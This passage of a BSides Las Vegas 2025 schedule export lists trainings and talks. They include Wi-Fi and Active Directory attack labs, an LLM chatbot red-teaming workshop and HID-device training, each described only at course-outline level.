U.S. Department of Energy Office of Cybersecurity, Energy Security, and Emergency Response (CESER). Cyber Informed Engineering Implementation Guide. Version 1.0, August 7, 2023. https://www.osti.gov/biblio/1995796.
Cyber-Informed Engineering Workbook: CIE Hands-On Training. Technical Report, May 29, 2024. https://www.osti.gov/biblio/2371031.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/EAYEJC/</url>
            <location>Pearl</location>
            
            <attendee>Art Conklin</attendee>
            
            <attendee>Virginia “Ginger” Wright</attendee>
            
            <attendee>Andrew Ohrt</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>DVKZMR@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-DVKZMR</pentabarf:event-slug>
            <pentabarf:title>Wi-Fi-So-Serious</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T150000</dtstart>
            <dtend>20250805T190000</dtend>
            <duration>040000</duration>
            <summary>Wi-Fi-So-Serious</summary>
            <description>Wi-Fi-So-Serious is a beginner-friendly course teaching the basics of 802.11, common Wi-Fi troubleshooting, command-line tools, network reconnaissance, and attacks against common Wi-Fi security protocols. It wraps up with a hands-on CTF to apply the learned skills.

Practical Troubleshooting Skills:
Participants will learn:
Common Wi-Fi Issues: Identifying and understanding typical connectivity problems, such as signal interference, authentication failures, and dropped connections.
Troubleshooting Methodologies: Developing a systematic approach to diagnose Wi-Fi issues, including checking physical connections and analyzing network configurations.
Basic Troubleshooting Tools: Getting introduced to software or built-in operating system tools that can help analyze Wi-Fi environments and identify problems.

Network Reconnaissance:
Understanding the surrounding wireless environment is a key step in both network management and security testing. The course will cover methods for:
Passive Scanning: Detecting and gathering information about Wi-Fi networks without actively interacting with them. This includes identifying SSIDs, BSSIDs, supported data rates, and security protocols.
Active Scanning: Probing networks to gather more detailed information, potentially revealing hidden networks or vulnerabilities.
PCAP Analysis: Using Wireshark to extract information from PCAP files. 

Attacking and Cracking Common 802.11 Security Protocols:
Open/OWE: Coffee Shop attacks and recon
WPS/Wi-Fi Direct: An overview and look at useful tools for attacking WPS and Wi-Fi Direct.
WEP: Understanding the historical weaknesses of WEP and how it can be easily cracked using readily available tools.
WPA/WPA2: Exploring the vulnerabilities in WPA and WPA2, including handshake capture and password cracking techniques (e.g., dictionary attacks, brute-force attacks).
WPA3: An overview of the improvements in WPA3 and its resistance to some of the older attack methods. Participants will learn how to attack WPA3 by leveraging transition mode.
EAP: A high-level overview, recon, and basics of EAP network attacks

Hands-On CTF:
The course culminates in a CTF, which is an invaluable way for participants to solidify their learning in a practical and engaging manner. The CTF will involve a series of challenges where participants need to use what they have learned during the class.

What to Bring: 

Students should bring a laptop with at least 8GB of RAM and VMware or VirtualBox already installed. Students should have the provided VM loaded as well.
Students should also bring a Wi-Fi card that is capable of monitor mode and packet injection. Recommended card: AWUS036ACM</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/DVKZMR/</url>
            <location>Pearl</location>
            
            <attendee>James Hawk</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>XMWTBT@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-XMWTBT</pentabarf:event-slug>
            <pentabarf:title>LLM Mayhem: Hands-On Red Teaming for LLM Applications</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T103000</dtstart>
            <dtend>20250805T143000</dtend>
            <duration>040000</duration>
            <summary>LLM Mayhem: Hands-On Red Teaming for LLM Applications</summary>
            <description>In this workshop we have set up hypothetical chatbots with varying levels of difficulty to walk attendees through various attack techniques. We&#x27;ll model the attack after typical red team engagements we have been on in order to test the resiliency of an LLM-powered application. The goals of this session are to: (1) provide a foundation on red teaming chatbots, (2) understand how and why the attacks work, and (3) provide guidance on how attendees can set up their own infrastructure to test and hone their skills after the conference has concluded.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/XMWTBT/</url>
            <location>Opal</location>
            
            <attendee>Travis Smith</attendee>
            
            <attendee>Kasimir Schulz</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>88YDQ7@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-88YDQ7</pentabarf:event-slug>
            <pentabarf:title>Hands on DuckyScript: Introduction to HID Attacks with O.MG Devices</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T150000</dtstart>
            <dtend>20250805T190000</dtend>
            <duration>040000</duration>
            <summary>Hands on DuckyScript: Introduction to HID Attacks with O.MG Devices</summary>
            <description>This beginner-friendly training will be approximately 4 hours and introduces attendees to the world of physical red teaming using O.MG Devices. This training is meant for those with minimal prior experience and covers the fundamentals of HID (Human Interface Device) attacks, ethical hacking, and how attackers exploit physical access to systems using tools that emulate keyboards and mice. Participants will learn how to use the O.MG Plug. Attendees will be encouraged to bring their own devices; however, O.MG Plugs will be available for purchase to ensure uniformity of the training. While the class focuses on O.MG devices, the techniques and scripting knowledge are transferable to other DuckyScript-compatible devices like those offered by Hak5.
The trainers have a variety of experiences, including experience with blue teaming, red teaming (physical attacks), and accessibility. Each trainer will bring these unique personal experiences to the attendees and introduce use cases, common tools, deployment strategies, and the truth behind popular portrayals of hacking. The course then delves into the technical workings of USB HID protocols and how DuckyScript leverages them to automate keystrokes, launch payloads, and even initiate wireless or geo-fenced commands.
Students will get hands-on experience flashing, configuring, and scripting O.MG Devices. The course also covers payload design—emphasizing reliability, stealth, and accessibility—and explores advanced features such as remote control, C2 (Command and Control) integration, and security best practices.
No prior scripting experience is required, though basic familiarity with networking and operating systems will be helpful. Students must bring their own laptop. By the end of the course, students will have a strong foundational understanding of HID-based attacks, be able to create and deploy basic payloads, and appreciate the role of human factors in security breaches.

</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/88YDQ7/</url>
            <location>Opal</location>
            
            <attendee>Wasabi</attendee>
            
            <attendee>Kalani Helekunihi</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>TG9SK9@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-TG9SK9</pentabarf:event-slug>
            <pentabarf:title>From Zero Trust to Trusted Advisor: Selling Security to Stakeholders</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T103000</dtstart>
            <dtend>20250805T143000</dtend>
            <duration>040000</duration>
            <summary>From Zero Trust to Trusted Advisor: Selling Security to Stakeholders</summary>
            <description>Target Audience:
Security professionals of all levels (penetration testers, security engineers, analysts, red teamers, etc.) who want to improve their communication and persuasion skills to influence stakeholders and drive security initiatives.

Workshop Objectives:
Participants will be able to:
• Identify and analyze key stakeholders, influencers, and decision makers within their organizations.
• Translate technical findings or concepts, such as security by design, into business-centric language.
• Tailor your message to your stakeholders and influence them to make better decisions (social engineering for good!).
• Articulate the ROI of security investments.
• Effectively counter common objections and adversarial tactics.
• Develop a practical method for ongoing stakeholder engagement.
• Practice communicating complex security issues to non-technical audiences.
• Build trust and credibility with diverse stakeholders.
• Overcome their own fears and perceived limitations when dealing with key business decision makers.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/TG9SK9/</url>
            <location>Emerald</location>
            
            <attendee>Glen Sorensen</attendee>
            
            <attendee>Daniela Parker</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>8AZNL7@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-8AZNL7</pentabarf:event-slug>
            <pentabarf:title>Active Directory Attacks and Defense 101</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T150000</dtstart>
            <dtend>20250805T190000</dtend>
            <duration>040000</duration>
            <summary>Active Directory Attacks and Defense 101</summary>
            <description>Active Directory remains a critical and often vulnerable component in enterprise environments. Misconfigurations, legacy protocols, and overly permissive defaults frequently expose organizations to high-impact attacks. This 4-hour technical workshop equips attendees with both offensive and defensive AD skills, focusing on real-world threats and mitigation strategies.
     The session begins with a quick primer on AD architecture—covering domain controllers, LDAP, Kerberos, NTLM, and common user/computer misconfigurations. Students will learn how attackers enumerate domains and locate exploitable targets using built-in Windows tools and open-source utilities.
     Students will then perform impactful attacks in their own isolated Azure lab environments including:
- NTLM Relay using an Ubuntu Docker machine to capture and relay credentials to AD services.
- Kerberoasting, where students request service tickets for SPNs and crack them offline.
- Machine Account Quota abuse, exploiting the default ability for authenticated users to create computer accounts.
- Unconstrained Delegation, showing how attackers impersonate users when delegation is misconfigured.
      After each attack, students will implement defenses including:
- Configure SMB and LDAP signing to prevent relay attacks.
- Restrict MachineAccountQuota and delegate computer creation privileges.
- Convert Unconstrained Delegation to Constrained/Resource-Based Delegation.
- Use Blue Team tools such as BloodHound CE and PingCastle to investigate a possible breach.
     Logging and detection are core to any defense. Students will learn how to increase LDAP diagnostic logging levels on the DC, identify key logs associated with each attack, and configure Windows Event Forwarding (WEF) to send critical events to a centralized Ubuntu-based log collector. The lab demonstrates how increasing visibility makes even stealthy attacks detectable.
     All scenarios will be demonstrated live and reinforced through guided student lab exercises. Lab guides include screenshots and command snippets for easy reference. Students will walk away with a reusable lab environment and deeper insight into AD threats, defense-in-depth strategies, and hardening techniques suitable for real-world environments.
     This course is ideal for Windows administrators, red teamers, blue teamers, and anyone responsible for defending Microsoft environments.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/8AZNL7/</url>
            <location>Emerald</location>
            
            <attendee>Darryl G. Baker</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>9GQUFW@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-9GQUFW</pentabarf:event-slug>
            <pentabarf:title>AI Governance in Action: Fundamentals &amp; Tabletop Workshop</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T103000</dtstart>
            <dtend>20250805T143000</dtend>
            <duration>040000</duration>
            <summary>AI Governance in Action: Fundamentals &amp; Tabletop Workshop</summary>
            <description>This workshop is designed for security professionals, risk managers, and compliance officers seeking to understand and apply AI governance principles. The session begins with an overview of AI governance fundamentals, including risk assessment, policy development, and regulatory compliance. The latter half involves a tabletop exercise where participants navigate a simulated AI incident, encouraging the application of learned concepts in a controlled environment. The workshop emphasizes interactive learning, providing participants with templates, checklists, and a practical playbook for managing AI risks.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/9GQUFW/</url>
            <location>Diamond</location>
            
            <attendee>Josh Harguess</attendee>
            
            <attendee>Chris Ward</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>KRY9EL@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-KRY9EL</pentabarf:event-slug>
            <pentabarf:title>Eliminating Bug Classes at Scale: Leveraging Browser Features for Proactive Defense</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T150000</dtstart>
            <dtend>20250805T190000</dtend>
            <duration>040000</duration>
            <summary>Eliminating Bug Classes at Scale: Leveraging Browser Features for Proactive Defense</summary>
            <description>Fixing the same vulnerabilities over and over doesn’t scale. This workshop takes a different approach - eliminating entire bug classes (where we can) using the latest browser security features (some are very new). With the new OWASP Proactive Controls list now including C6 browser security, it’s the perfect time to focus on prevention instead of endless patching.

I first ran this workshop inside my own organization, and even experienced AppSec leads found it eye-opening. The idea was inspired by some work happening behind closed doors at big tech companies, e.g. Google. One of the things made public was the Security Signals research paper by Google. I took those ideas, built on them, and created this hands-on training. 

- Attendees will exploit vulnerabilities in a training app, then apply defenses like CSP v3, Trusted Types, and Sec-Fetch-Metadata to see their impact in real-time.
- Teams will compete to break and defend a web application using modern security headers and policies.
- We’ll analyze security breaches that could have been prevented with these mechanisms, making the session practical and engaging.
- Attendees will learn how to measure and enforce adoption across an organization using their own automation, rather than relying on one-off fixes.

- Many security workshops focus on finding and fixing individual bugs. This workshop shifts the perspective toward eliminating entire bug classes using modern browser security features.
- Unlike classic hands-on labs, this workshop helps attendees think at scale - how to enforce security measures across entire organizations, making it relevant to large enterprises as well as individual developers.
- Covers new web security standards that didn’t exist a few years ago, offering attendees fresh, actionable knowledge beyond OWASP basics.
- Unlike many offensive security workshops, this is a security-builder-focused session, empowering developers and security teams to integrate security-by-design.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/KRY9EL/</url>
            <location>Diamond</location>
            
            <attendee>Javan Rasokat</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>PEKNAB@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-PEKNAB</pentabarf:event-slug>
            <pentabarf:title>Gremlin Hunting with SIGMA rules</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T103000</dtstart>
            <dtend>20250805T143000</dtend>
            <duration>040000</duration>
            <summary>Gremlin Hunting with SIGMA rules</summary>
            <description>Training will start with a walkthrough of what SIGMA rules are, how they work, and how to construct them. I will show various community resources available on how to get started implementing SIGMA in your environment. I will then cover in detail the workflow for our guided hunt framework, &quot;Gremlin Hunters&quot;:
1) How the hunts are developed using the SIGMA rule format, using OSINT and internal research.
2) How rules are entered into our MISP instance, where we use pySigma to process and translate the rules.
3) How the rules are then sent over to our ticketing system, where they are distributed to the hunting team on a weekly basis.
4) How the hunt team uses the translations, tailors them to the environment, then submits findings (and a prod-ready rule if applicable).</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/PEKNAB/</url>
            <location>Boardroom</location>
            
            <attendee>Rain Baker</attendee>
            
            <attendee>Nicholas Carroll</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>RB9NV3@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-RB9NV3</pentabarf:event-slug>
            <pentabarf:title>Threat and adversary emulation operational exercises</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T150000</dtstart>
            <dtend>20250805T190000</dtend>
            <duration>040000</duration>
            <summary>Threat and adversary emulation operational exercises</summary>
            <description>This hands-on workshop is designed to equip participants with a solid foundation in practical threat and adversary emulation. Through guided exercises in a controlled, enterprise-grade lab environment, attendees will learn how to safely emulate real-world threat actors. All lab systems will include active defenses such as Anti-Virus, Web Proxies, EDR, SIEM integration and other detection mechanisms.
Key topics covered include:
•	Gathering actionable cyber threat intelligence
•	Planning and executing adversary emulation engagements
•	Utilizing attack emulation tools and frameworks
•	Leveraging MITRE ATT&amp;CK for mapping and execution
•	Threat hunting techniques
•	Building custom adversary emulation plans
•	An introduction to dynamic adversary simulation
Each module includes step-by-step walkthroughs of attack vectors, guiding participants through realistic attack paths across enterprise environments. The goal is to help attendees evaluate the effectiveness of security controls and better understand how to test and improve cyber defenses through adversary emulation.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/RB9NV3/</url>
            <location>Boardroom</location>
            
            <attendee>Abhijith &quot;Abx&quot; B R</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>7MBYEA@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-7MBYEA</pentabarf:event-slug>
            <pentabarf:title>HR Hates My Mugs: Evading AI Censorship (Token 07)</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T100000</dtstart>
            <dtend>20250805T102500</dtend>
            <duration>002500</duration>
            <summary>HR Hates My Mugs: Evading AI Censorship (Token 07)</summary>
            <description>n/a</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/7MBYEA/</url>
            <location>Misora</location>
            
            <attendee>TerryBibbles</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>TRNJJY@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-TRNJJY</pentabarf:event-slug>
            <pentabarf:title>Sex Work Is Tech Work: What Technologists Should Know From the Sex Industry (Token 07)</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T103000</dtstart>
            <dtend>20250805T111500</dtend>
            <duration>004500</duration>
            <summary>Sex Work Is Tech Work: What Technologists Should Know From the Sex Industry (Token 07)</summary>
            <description>n/a</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/TRNJJY/</url>
            <location>Misora</location>
            
            <attendee>Gwyndolyn</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>PBWQHT@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-PBWQHT</pentabarf:event-slug>
            <pentabarf:title>Mapping the Gaps: How Disconnects in Critical Infrastructure Leave Cities Vulnerable (Token 08)</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T140000</dtstart>
            <dtend>20250805T142000</dtend>
            <duration>002000</duration>
            <summary>Mapping the Gaps: How Disconnects in Critical Infrastructure Leave Cities Vulnerable (Token 08)</summary>
            <description>n/a</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/PBWQHT/</url>
            <location>Misora</location>
            
            <attendee>QuietRoar</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>9JKECQ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-9JKECQ</pentabarf:event-slug>
            <pentabarf:title>Organizing Cyber: Why We Need More IT &amp; Cybersecurity Unions (Token 08)</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T142500</dtstart>
            <dtend>20250805T144500</dtend>
            <duration>002000</duration>
            <summary>Organizing Cyber: Why We Need More IT &amp; Cybersecurity Unions (Token 08)</summary>
            <description>n/a</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/9JKECQ/</url>
            <location>Misora</location>
            
            <attendee>CyberGuy</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>7RPBUM@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-7RPBUM</pentabarf:event-slug>
            <pentabarf:title>Ask EFF (Token 09)</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T150000</dtstart>
            <dtend>20250805T154500</dtend>
            <duration>004500</duration>
            <summary>Ask EFF (Token 09)</summary>
            <description>Panelists from the EFF Staff will give brief updates on key topics in their expertise before turning it over to BSides attendees to ask their burning questions about policy, advocacy and making the future of tech brighter.  It&#x27;s a dynamic session fostering engaging discussions on digital rights featuring an EFF staff attorney, activist, and public interest technologist. 

Moderator Hannah Zhao (she/her) is a Senior Staff Attorney on EFF’s Coders Rights Project. Her work with CRP protects hackers, researchers, and tinkerers on the digital frontier through legal defense, amicus briefs, and education. She also works to push back on emerging surveillance technologies like face recognition, electronic monitoring, and government drones. Hannah has a background in computer science, criminal justice, and international human rights law before her time at EFF. 

Chris Vines (he/him) is EFF&#x27;s Grassroots Advocacy Organizer, working with members of the Electronic Frontier Alliance (EFA). With over a decade of experience in organizing and having been a part of over 50 successful electoral &amp; non-profit campaigns, Chris has been instrumental in building progressive bases in several states and is passionate about mobilizing people and getting them the tools needed to bring about progressive change.  

Lisa Femia (she/her) is a Staff Attorney on EFF&#x27;s civil liberties team. Her work focuses on surveillance, privacy, free speech, and the impact of technology on civil rights and civil liberties. Lisa came to EFF from Hogan Lovells US LLP, where she maintained a robust pro bono practice centered on democracy reform, criminal justice, and civil rights. 

Alexis Hancock (she/her) is EFF’s Director of Engineering on our Public Interest Technologist team. She researches an intersection of issues on digital rights, encryption, and consumer technology. She is also well known for managing the Certbot project, advocating for open technology standards and for unveiling insecurities in consumer devices.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/7RPBUM/</url>
            <location>Misora</location>
            
            <attendee>Chris Vines</attendee>
            
            <attendee>Hannah Zhao</attendee>
            
            <attendee>Lisa Femia</attendee>
            
            <attendee>Alexis Hancock</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>93CHRX@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-93CHRX</pentabarf:event-slug>
            <pentabarf:title>From Drone Strike to File Recovery, outsmarting a nation state (Token 10)</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T160000</dtstart>
            <dtend>20250805T164500</dtend>
            <duration>004500</duration>
            <summary>From Drone Strike to File Recovery, outsmarting a nation state (Token 10)</summary>
            <description>n/a</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/93CHRX/</url>
            <location>Misora</location>
            
            <attendee>Guy Barnhart-Magen</attendee>
            
            <attendee>Brenton Morris</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>XZ9RXT@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-XZ9RXT</pentabarf:event-slug>
            <pentabarf:title>Stopping the Nuclear Apocalypse with Threat Intel (Token 11)</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T170000</dtstart>
            <dtend>20250805T172000</dtend>
            <duration>002000</duration>
            <summary>Stopping the Nuclear Apocalypse with Threat Intel (Token 11)</summary>
            <description>Please see above abstract.

This is a short talk talking about what we saw that day, and how we used threat intel on top of our X&amp;Os playbooks to understand that what we were looking at was a way bigger attempt than it appeared.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/XZ9RXT/</url>
            <location>Misora</location>
            
            <attendee>Paul Miller</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>TAMDET@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-TAMDET</pentabarf:event-slug>
            <pentabarf:title>Crossing the Border Again with a Burner Phone (Token 11)</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T172500</dtstart>
            <dtend>20250805T174500</dtend>
            <duration>002000</duration>
            <summary>Crossing the Border Again with a Burner Phone (Token 11)</summary>
            <description>n/a</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/TAMDET/</url>
            <location>Misora</location>
            
            <attendee>Wendy Knox Everette</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>AWCU7W@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-AWCU7W</pentabarf:event-slug>
            <pentabarf:title>A glitch in the matrix:  HUMINT OSINT and Digital Forensics to identify &amp; remove hostile foreign corporate espionage actors (Token 12)</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T180000</dtstart>
            <dtend>20250805T184500</dtend>
            <duration>004500</duration>
            <summary>A glitch in the matrix:  HUMINT OSINT and Digital Forensics to identify &amp; remove hostile foreign corporate espionage actors (Token 12)</summary>
            <description>n/a</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/AWCU7W/</url>
            <location>Misora</location>
            
            <attendee>John O. Thorne</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>HM7REA@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-HM7REA</pentabarf:event-slug>
            <pentabarf:title>Morning Trainings, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T103000</dtstart>
            <dtend>20250805T143000</dtend>
            <duration>040000</duration>
            <summary>Morning Trainings, Tuesday</summary>
            <description>Morning Trainings, Tuesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/HM7REA/</url>
            <location>Foyer, Platinum Hotel Conference Center</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>TKFECF@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-TKFECF</pentabarf:event-slug>
            <pentabarf:title>Trainer Box Lunches Delivered, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T143000</dtstart>
            <dtend></dtend>
            <duration>000000</duration>
            <summary>Trainer Box Lunches Delivered, Tuesday</summary>
            <description>Trainer Box Lunches Delivered, Tuesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/TKFECF/</url>
            <location>Foyer, Platinum Hotel Conference Center</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>ULDGKP@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-ULDGKP</pentabarf:event-slug>
            <pentabarf:title>Afternoon Trainings, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T150000</dtstart>
            <dtend></dtend>
            <duration>040000</duration>
            <summary>Afternoon Trainings, Tuesday</summary>
            <description>Afternoon Trainings, Tuesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/ULDGKP/</url>
            <location>Foyer, Platinum Hotel Conference Center</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>ZRR3WQ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-ZRR3WQ</pentabarf:event-slug>
            <pentabarf:title>Breaking the Guest List: Hacking Invitation Systems for Fun and Profit</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250806T100000</dtstart>
